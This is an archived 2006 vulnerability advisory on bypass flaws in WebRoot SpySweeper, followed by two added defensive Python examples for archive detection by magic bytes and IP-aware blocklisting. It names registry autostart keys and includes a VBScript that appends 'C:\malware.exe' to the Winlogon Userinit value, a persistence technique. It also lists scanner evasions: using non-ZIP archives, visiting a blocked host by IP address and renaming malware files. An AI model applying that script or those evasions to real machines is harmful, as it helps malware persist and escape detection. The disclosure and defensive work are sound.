Multiple Bypass and Integrity Lost Vulnerabilities (posted Jun 20 2006 01:07PM)
egavriil (at) sentinel (dot) gr


Sentinel Computer Security Advisory

Sentinel Co.

http://www.sentinel.gr

info (at) sentinel (dot) gr

General Flaw Description : Multiple Bypass and Integrity Lost Vulnerabilities

-------------------------------------------------------------------------------

Advisory Information

-------------------------------------------------------------------------------

Advisory Release Date : 2006/06/20

Advisory ID : SGA-0001

Extends : None

Deprecates : None

-------------------------------------------------------------------------------

Product Information

-------------------------------------------------------------------------------

Software Product Name : SpySweeper

Product Version : All to 4.5.9 Build 709

Product Vendor : WebRoot (http://www.webroot.com)

Flawed File Name : spysweeper.exe

File Version : All to 4.5.9 Build 709

Default Local Path of the File : C:\Program Files\Webroot\Spysweeper

-------------------------------------------------------------------------------

Vulnerability Information

-------------------------------------------------------------------------------

Flaw Type : Design Flaw

Operating Systems : All Microsoft Windows

Vulnerability Impact : Bypass Security Measures

Vulnerability Rating : Critical

Patch Status : Unpatched

Advisory Status : Verified

Publicity Level : Published

Other Advisories IDs : None

Flaw Discovery Date : 2006/05/30

Patch Date : None

Vulnerability Credit : Emmanouil Gavriil (egavriil (at) sentinel (dot) gr)

Exploit Status : Not Released

Exploit Publication Date : None

-------------------------------------------------------------------------------

Description

-----------

WebRoot SpySweeper is an application that provides various security measures
for your computer. Some of these measures can be easily bypassed, and the
bypass methods can be used by malware to avoid the security measures provided
by SpySweeper.

Technical Information

---------------------

The following vulnerabilities have been identified in WebRoot SpySweeper:

1) Bypassing Startup Shield. Modifications to certain Registry Keys avoid the
security measures provided by the Startup Shield.

2) Bypassing Compression Sweep. Compression Sweep claims to detect malware in
compressed files, but it appears to detect malware only in files compressed
with ZIP compression.

3) Bypassing Spy Communication Shield. Spy Communication Shield appears to
check only the domain name of the site to be visited; if the same site is
visited by its IP address, Spy Communication Shield does not block it.

4) Integrity loss due to incorrect detection of files.

Proof of Concept Experiment

---------------------------

1) The following Registry Keys can be used to bypass the Startup Shield:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
HKEY_CLASSES_ROOT\exefile\shell\open\command @="\"%1\" %*"
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName

You can use the following script to prove the vulnerability (save the
following code as .vbs):

****************************************************************************

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")

' Write the Winlogon key's default value
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", 1, "REG_BINARY"

' Append a second, comma-separated program to the Userinit value
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", "C:\WINDOWS\system32\userinit.exe, C:\malware.exe", "REG_SZ"

WScript.Echo "There is an entry at: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit with Value 'C:\WINDOWS\system32\userinit.exe, C:\malware.exe' After the execution of userinit.exe, malware.exe could be run!"

****************************************************************************

2) Compressed file scanning can be bypassed by compressing to one of the
following formats:

RAR, GZ, TAR, CAB, ACE
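A scanner that only opens ZIP leaves every other container unexamined, and an extension check does not help because the name says nothing about the bytes. The following Python is an added example, not part of the Sentinel advisory or of SpySweeper: it identifies an archive's real format from its leading bytes at the documented offsets and lists which constructed samples a ZIP-only sweep would never look inside. The ZIP, gzip and tar samples are built with the standard library; the RAR, CAB and ACE samples are signature headers followed by filler, constructed for this example only.

```python
# Added example (not part of the Sentinel advisory or of SpySweeper): archive
# format detection by magic bytes, and the coverage gap of a ZIP-only scanner.
import gzip
import io
import tarfile
import zipfile

# (offset, magic bytes, format); offsets follow the published file formats.
SIGNATURES = [
    (0, b"PK\x03\x04", "zip"),
    (0, b"Rar!\x1a\x07", "rar"),
    (0, b"\x1f\x8b", "gzip"),
    (0, b"MSCF", "cab"),
    (7, b"**ACE**", "ace"),
    (257, b"ustar", "tar"),
]


def detect_archive(data):
    """Return the archive format indicated by the magic bytes, or None."""
    for offset, magic, fmt in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return fmt
    return None


def make_samples(payload=b"constructed payload, not malware"):
    """Constructed sample archives keyed by the file name each is given."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("a.txt", payload)
    zip_bytes = buf.getvalue()

    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as t:
        info = tarfile.TarInfo("a.txt")
        info.size = len(payload)
        t.addfile(info, io.BytesIO(payload))
    tar_bytes = buf.getvalue()

    gz_bytes = gzip.compress(payload)
    return {
        "sample.zip": zip_bytes,
        "sample.gz": gz_bytes,
        "sample.tar": tar_bytes,
        "sample.rar": b"Rar!\x1a\x07\x00" + payload,        # header only, constructed
        "sample.cab": b"MSCF" + payload,                    # header only, constructed
        "sample.ace": b"\x00" * 7 + b"**ACE**" + payload,   # header only, constructed
        "renamed.zip": gz_bytes,  # gzip data carrying a .zip name
    }


def skipped_by(samples, opened=frozenset({"zip"})):
    """Names whose real format lies outside the set of formats a scanner opens."""
    return sorted(n for n, d in samples.items() if detect_archive(d) not in opened)


if __name__ == "__main__":
    for name in skipped_by(make_samples()):
        print("not opened by a ZIP-only sweep:", name)
```

`renamed.zip` is the case worth noting: by extension it looks like the one format the sweep handles, by content it is gzip, so a content-aware scanner must decide by signature before choosing a decompressor.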

3) Spy Communication Shield Bypass Proof of Concept:

banners.pennyweb.com should be blocked.
63.208.235.96 is not blocked.
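The following Python is an added example, not part of the Sentinel advisory or of SpySweeper. It places the name-only check the advisory describes next to a check that also matches the address a blocked name resolves to, using the name and IP pair from the proof of concept above. `RESOLVER` is a constructed, offline stand-in for a DNS lookup so the example runs without network access; the hardened check also matches parent domains, which goes beyond what the advisory tests.

```python
# Added example (not part of the Sentinel advisory or of SpySweeper): blocklist
# matching by host name only, beside matching by name, parent domain and
# resolved address. RESOLVER is a constructed table, not a live lookup.
import ipaddress
from urllib.parse import urlsplit

BLOCKED_DOMAINS = {"banners.pennyweb.com"}
RESOLVER = {"banners.pennyweb.com": {"63.208.235.96"}}  # constructed, stands in for DNS


def host_of(url):
    """Lower-cased host of a URL, without trailing dot or IPv6 brackets."""
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def is_blocked_name_only(url):
    """The behaviour the advisory reports: only the literal host name is compared."""
    return host_of(url) in BLOCKED_DOMAINS


def blocked_addresses():
    """Every address a blocked name is known (via RESOLVER) to resolve to."""
    return {
        ipaddress.ip_address(addr)
        for domain in BLOCKED_DOMAINS
        for addr in RESOLVER.get(domain, ())
    }


def is_blocked(url):
    """Block by name, by any parent domain, or by a resolved address of a blocked name."""
    host = host_of(url)
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # not an IP literal; fall through to name matching
    if ip is not None:
        return ip in blocked_addresses()
    labels = host.split(".")
    return any(".".join(labels[i:]) in BLOCKED_DOMAINS for i in range(len(labels)))


if __name__ == "__main__":
    for url in ("http://banners.pennyweb.com/ad.gif", "http://63.208.235.96/ad.gif"):
        print(url, "name-only:", is_blocked_name_only(url), "hardened:", is_blocked(url))
```

In a real deployment the address set must be refreshed as the blocked names' records change, and a request to an address the resolver has never returned for a blocked name is still allowed; the check closes the literal-IP bypass shown above, not every evasion.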

4) 90.dl and/or 51.dl are valid ARRISCAD (www.arriscad.com) drawing list files.
SpySweeper tends to remove those files. Such a removal could destroy an
ARRISCAD database. Furthermore, it is unclear why even an empty file named
90.dl or ieonflow.dll is considered adware or spyware. Additionally, renaming
some malware files (e.g. ieonflow.dll) evades detection by SpySweeper.

Patch Description and Information

---------------------------------

Vendor informed. No reply yet. No patch released yet.

References and Other Resources for Information

----------------------------------------------

None.

EOF.
